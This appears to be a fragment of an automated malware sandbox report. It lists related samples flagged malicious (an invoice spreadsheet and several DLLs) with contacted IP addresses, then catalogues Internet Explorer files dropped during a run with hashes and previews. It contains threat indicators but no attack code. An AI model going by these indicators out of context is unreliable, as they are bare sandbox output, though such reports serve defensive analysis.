	Invoice.xlsx	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	yMPBuPqE33.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	jLluep47xI.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	1xjJ6fFB1b.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	TooltabExtension.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	jqzMAYCER2.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	TooltabExtension.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	KHP6cmziNb.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	SBnLImhV6r.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	CEKzPxFOmi.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	5ch8dv7ceO.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	0YM5hwP6b3.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	N8OeefFV0T.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	f5rSnwtlOS.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	EQfXW3UETC.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	TvZcNQ8W30.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	tb_unpacked_21_10_5.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.1624866828857074
Encrypted:	false
SSDEEP:	3:D90aK1ryRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAe9udilDM9qSLYZLKb:JFK1rUFkduqswEkIXH40AAe9uiDMl/b
MD5:	9475ADAFC27DB10C95798744D8905AB6
SHA1:	E0630FECF0204A847B7456DE19550EA9FBF69BA0
SHA-256:	9D195BC343C90A6CA8C0A9F6610DDC29FCC88C81A8FD6F674D0535F993888879
SHA-512:	6ED8DABE8C6E33AE9B488D0626CD57B69F4902D3E69FE3C1A94A6508B1F1FE08B5526386F11AB5DB9CEE654D72B54B991F72FF6ADFADE6F08822692C229740BB
Malicious:	false
Preview:	<root></root><root><item name="BT_AA_DETECTION" value="{"ab":false,"acceptable":true}" ltime="2088788432" htime="30915458" /></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3084
Entropy (8bit):	4.957043190419212
Encrypted:	false
SSDEEP:	96:QRi/Ri/Ri8i8i8i8ifi8itititi0i0i0i0iTi0i0iTi0i0iQwifi0iQwifi0iQMu:QKKZ
MD5:	7A37F659DA566B66767688A75F48D04A
SHA1:	B2E4AA717B47B4F58BEBFA5F8107799BBBF76C2E
SHA-256:	BB18DD5BBA43FB527A9CF239F4090834C9043A1EF8068107F5A3168B975B03A1
SHA-512:	9D93D22316563046933CED071C23108B7D765EA40B343F1E16D475ACF0E87F0FE4DC0A66A76406C1D253AEED729F3B922DA7EA39BBE5AF621A489F0D85DA54C2
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="2044788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2044788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2044788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /><item name="mntest" value="mntest" ltime="2048788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2052268432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2052268432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2052268432" htime

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AE6AEE69-2775-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	126312
Entropy (8bit):	2.2837259049504364
Encrypted:	false
SSDEEP:	384:r0loN+hi/ryn66yEfJ1qfm7i6Y/8VQB526UL7JZg2t7ysApmZXiY92Xo5Yyl0TDf:J
MD5:	6605F18470B8D87FD7FD764D5C502C9A
SHA1:	6A2A195C3B0477F0D35CAB5BD5A869DD5A62A8CF
SHA-256:	E7F1D289FACE576A2B73D3B6DFBEB93036A728BA318D6B943698230ACAC109F2
SHA-512:	9679EE4B205838391CFF28022EC6011D44F246C20029DD024B824519058EAD079239202D28702D600212E1EC86933B3A28B96DF641D686421421F11C22E0DA7B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{078013E1-2776-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28136
Entropy (8bit):	1.9180111106540512
Encrypted:	false
SSDEEP:	96:rVZOQi6gBSEjB2aWDM7yUmo3QcNldo3QcjA:rVZOQi6gkEjB2aWDM7yUmFcNldFcjA
MD5:	BECF11EC971A658120EDA45C0A19E0F5
SHA1:	C086211CD5000E4E923FF2DC9298C8EBEF3CF7BD
SHA-256:	644ADCC8A3C54B7E7DA8005AAB91E56E342B5A6992B4701BCABE82B1E47B8D50
SHA-512:	9920AA28E0AF7F2C659B19A4939E8FE90D94D64641FC9D2623926E240EDB5230C370B743B3640DD4EF41B2D0FA5D652DBA2EC5FF5FE01BD9E170A30F261E78B6
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	211190
Entropy (8bit):	3.61606394553613
Encrypted:	false
SSDEEP:	3072:JZ/2Bfc/mu5kgTzXtOZ/2Bfcgmu5kgTzXt8:QsS
MD5:	4AF67B62CFBAC5D537204EE4CE24788E
SHA1:	7C0793C387212F0B25BFB47FDD3E587EAE9E6122
SHA-256:	805F9A42BD9DFAC2E2D3B5C0D597432322C533EBC496877D3A39461DD08C6EDE
SHA-512:	DF962852086C39490E591411DB72000C30613EC1067E03E604AEA8BC6EE8D35C25D500D635CFE1757DD3F76501FAB7855AFB13BEC3137BF72FAB2B1479041B22
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B857F74E-2775-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5858755191782974
Encrypted:	false
SSDEEP:	48:IwcGcprpGwpa0G4pQkGrapbSWtGQpKlG7HpRMTGIpX2KGApm:rAZDQE6yBSWXAUTYFhg
MD5:	B38ED69517B261608B9D472B5026441C
SHA1:	A92834236BC5E596AFC5684F7D69F9FE414704B6
SHA-256:	AECD40BF646DCAD07A307EDF27C1160702AB256429011F7D514214AD194089B5
SHA-512:	7AC68530E56D58089EDD53D7CD0F7EB60300FE03E5B0DA86C093D5C08464175B2831EFCA22F0A0D2F3B9CB8B1B65428CC4E407093060B48B6CA8381831C66E30
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E5354AB5-2775-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27592
Entropy (8bit):	1.919147838287388
Encrypted:	false
SSDEEP:	192:rFZaQX6lk3j12hWGMKBpvRBDiPHlpvRBDiPgvPA:rLXquzsQvSpONpOIg
MD5:	830B2D899F1B8E845E7B95AFF9D080E1
SHA1:	F1BA31E5E378688047B5E09E942F3181E18CD859
SHA-256:	4317548CFBE4F71B1FDE7467B18AF08CCF326359612348DC9F742914DCC5A8FB
SHA-512:	73BA2DD721F9A5C2E00A45D71CAD5CB03B2042D8282F7DE3C0B0AD10E910BC10E667FCFB6A56306A3809F4EAFF90E55B7E334489760A44A5283B4080BF106648
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F1E5E2AC-2775-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28136
Entropy (8bit):	1.918450349721024
Encrypted:	false
SSDEEP:	192:rToZ1pQkE6Cok8ji22WEMIyUX0R5lX30RkA:rTo1OkvC1uhtx7UiDyv
MD5:	184B4C09146D06F3FC5697EE0BB9CC8A
SHA1:	6ED37CFCCFA54B770D6765D5088B0634A71D31F4
SHA-256:	5B5046F4A15EDD85A5544F028965338A8ACAEBA060B05D10638F5B68A1E1C5F2
SHA-512:	586A743650255EDFFA8681B52C7C3DCB62E51494F9C5F0BBB5192B72FA28673A85F1435E1B970FD72961B4F18FB84AC5857EDBAEAC0CFDD1A6DEE6A218F1A424
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F1E5E2AE-2775-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28136
Entropy (8bit):	1.9192599265727548
Encrypted:	false
SSDEEP:	192:ruZxQt63kUjJ2VWAM0yUtEXudOlt8EXudKA:r6GY0GYsVPUtE+dWt8E+dt
MD5:	AF44A63AFB24F4D44169EF396F2DEB02
SHA1:	EED1B283E977B7074E6EEF15BC389F67250DAB01
SHA-256:	21579F6009644AD8AFB1083F329059989DD9050162AF11D5BE3CA11B49CB9BF3
SHA-512:	C40B0CE898494585C780EF7A02E9D17844429AB3F849DF448085E5259DD17835144DDE982873E74B73CB4136653CB5497E92FA604AEA74E2C30F832CB6374741
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.104566447619908
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEpnWimI002EtM3MHdNMNxOEpnWimI00OYGVbkEtMb:2d6NxO8SZHKd6NxO8SZ7YLb
MD5:	9A88F9D1D9E2236412ABC2D38702C510
SHA1:	BC3882E6F74CF03EDE07A05D756CF94E7ABE26A0
SHA-256:	E457D181A32B36290591F13864AE53602E5F1E1CBC82CF63584BBE1B7921B391
SHA-512:	5B8AC0E43A463A2F745B9DEF04E34AC786C0C634DA566C0EC39065BB2CBDB0250BB11DA220189F26371812256FE434BE3FB4A3488C17D76509FA3121374378C8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.166651584191686
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kMCiCdnWimI002EtM3MHdNMNxe2kMCiCdnWimI00OYGkak6EtMb:2d6NxrBB2SZHKd6NxrBB2SZ7Yza7b
MD5:	B698CAFD170A95B2AC8E2F3A6C75E2EB
SHA1:	5A1AF3BF918AA60766C697BC2051C7610B25261B
SHA-256:	B7692743817977E53531E6E58E2C2544CCA9BD768D8CC9FDFA2FC01C295ED240
SHA-512:	6D6C5521B8C2F3596A0374B3D3CADF880B28BA4D132373804862EB98FCA84AC94852F34A25F5DF57B55298C4F0648AB616A25C18D0D32061BA6D114705D85AC7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x89747cf6,0x01d7bb82</date><accdate>0x89747cf6,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x89747cf6,0x01d7bb82</date><accdate>0x89747cf6,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.123902948185453
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLpnWimI002EtM3MHdNMNxvLpnWimI00OYGmZEtMb:2d6NxvlSZHKd6NxvlSZ7Yjb
MD5:	5E42950B4B869C09CDAC0C3C000AA3B4
SHA1:	0578632B06C67C2391A89388A34AF836BBCE98B6
SHA-256:	768B726515D8EE2DEE22E122BAA510D33288C6A875E892ABDD16D74AAC17385D
SHA-512:	5AD714F256EA8805F1DB86C10B7A38934D16C3FF6BB683136DA94A6EB75F31A310F16A9031FE214394C50FF5D0087B7518DCA8BF6A3D932137F23E0AE4C5222C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.120176434752773
Encrypted:	false
SSDEEP:	12:TMHdNMNxipnWimI002EtM3MHdNMNxipnWimI00OYGd5EtMb:2d6NxaSZHKd6NxaSZ7YEjb
MD5:	B5FADA0DA8C76E9E433B1206D1FA15AD
SHA1:	69FD3182102B12F9FEB9DBC61677DE15735DCCCD
SHA-256:	AE3FAB653889F045A9B821FF7E4DBCB7773A10E0D71D945D6AC20A9E4A812100
SHA-512:	168892B956E6EDAB6C81948A5DAA9613B0BACCE52A1230724FD85B36D2999EF2942371C4C5A5BD1C8215299F530D97EA3A563133A010FD54BE1A199A39251D9B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1311557997155335
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwpnWimI002EtM3MHdNMNxhGwpnWimI00OYG8K075EtMb:2d6NxQwSZHKd6NxQwSZ7YrKajb
MD5:	868C789BE1A1A3E154E95F4BCE85CA7A
SHA1:	B7DE20689E0ADA07F1D5F957ABF0F074EC9D79CD
SHA-256:	3691E0FD284A8BC00411A5DF7D2488CEAAB326ADA33034A55100CEB4429784B0
SHA-512:	CB69EA553FE1109B38E2B7F6162F9354DD50D27DF2DD7108222EDD5AA3B096F96782AA6E63AF247CC42BC4E83B3A7CBFAF44943A18DAA018D42167F33AC52914
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.108377544021866
Encrypted:	false
SSDEEP:	12:TMHdNMNx0npnWimI002EtM3MHdNMNx0npnWimI00OYGxEtMb:2d6Nx0pSZHKd6Nx0pSZ7Ygb
MD5:	0FF2A37323AF09A1034630D772D9C403
SHA1:	408027CDB1A034C54B40517F889F58FC18F38A81
SHA-256:	4704B2CBFFB85A151CE6E25231B77AD9E30C042778CD3195735FAA8BC1C2981C
SHA-512:	ECBCC8AA7260C6EA380106DCDAF92F4A5AB0E31FA156DF1F0E3BFF31AC80D9CC2D5FEEBE4313DDA281D6D641FBED66A3CB02FFA35B178F28EBFF3D1DB725DC8A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.144201726947702
Encrypted:	false
SSDEEP:	12:TMHdNMNxxpnWimI002EtM3MHdNMNxxpnWimI00OYG6Kq5EtMb:2d6NxTSZHKd6NxTSZ7Yhb
MD5:	A0093698E3937071B6C8A27EE3598E48
SHA1:	E1DD8FBE3FB26C3E1423665911564E0D8F6AA584
SHA-256:	B152DA444C63F9E3D754C078E441B521B9E02119E69B6BAA0D28483AC3DFC511
SHA-512:	1C8D3DEAC641A90EEC80CC7528181B88B8A0DADFBC07EC823404FEA4A7FBACD45A09D7C550A8BCDF95A5D48791B2956DEBA9119E398777A0FAB9C2120A67B262
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.1155680282619995
Encrypted:	false
SSDEEP:	12:TMHdNMNxcpnWimI002EtM3MHdNMNxcpnWimI00OYGVEtMb:2d6NxkSZHKd6NxkSZ7Ykb
MD5:	C9E4235599EA791D2D634063CF4E818A
SHA1:	968C1A9732671495E73B2206046178731238F5F1
SHA-256:	D7C012AAE80946F67BB6CB5130F4E1EB47EB8643CAC49B6497968B734388CDA7
SHA-512:	86A5A38384B1693C9A4D9BB0CFCC92C360744F60DF92F4918D611923485A287E065E24AAB44848742FF2466A689CE135BAF76993222697BF94515F5349CB1EEB
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.10542056022373
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnpnWimI002EtM3MHdNMNxfnpnWimI00OYGe5EtMb:2d6NxRSZHKd6NxRSZ7YLjb
MD5:	17360312F39389C265F518F310332B7B
SHA1:	3CF609DEB14F1C49844C722456E8D664D551E613
SHA-256:	FFB248EF2421B8BC29AD1C90485AD51788F4A4BE43DB25623A2114989C8D70B0
SHA-512:	41F4C55BD10B08EE0CFA30D2255265316AC4D7FF51612539F8CAE2532A7C7BD1A075E00F00EF632C3AD5C432D99C2E4EC48070A1D34E7CA62D352CBA979E502A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.031898481780717
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGq:u6tWu/6symC+PTCq5TcBUX4bA
MD5:	2358510566AB1A8DFE25675D1A205105
SHA1:	5134B05C6094EF31FB3235B6A4A31C7EE4B2E50D
SHA-256:	3349DD9827C8C835F0EFD9AF45D98FAAD0DCEB24C34DA320F558FB0E258F33C2
SHA-512:	16218B5991F93FFB6DA98D831E0BE460618F49905E82AF4731F3A959BA4D50CE819240D32FE80E5F321779898C6765C8CE5ACFDD90325A2F4755B704CD3D2389
Malicious:	false
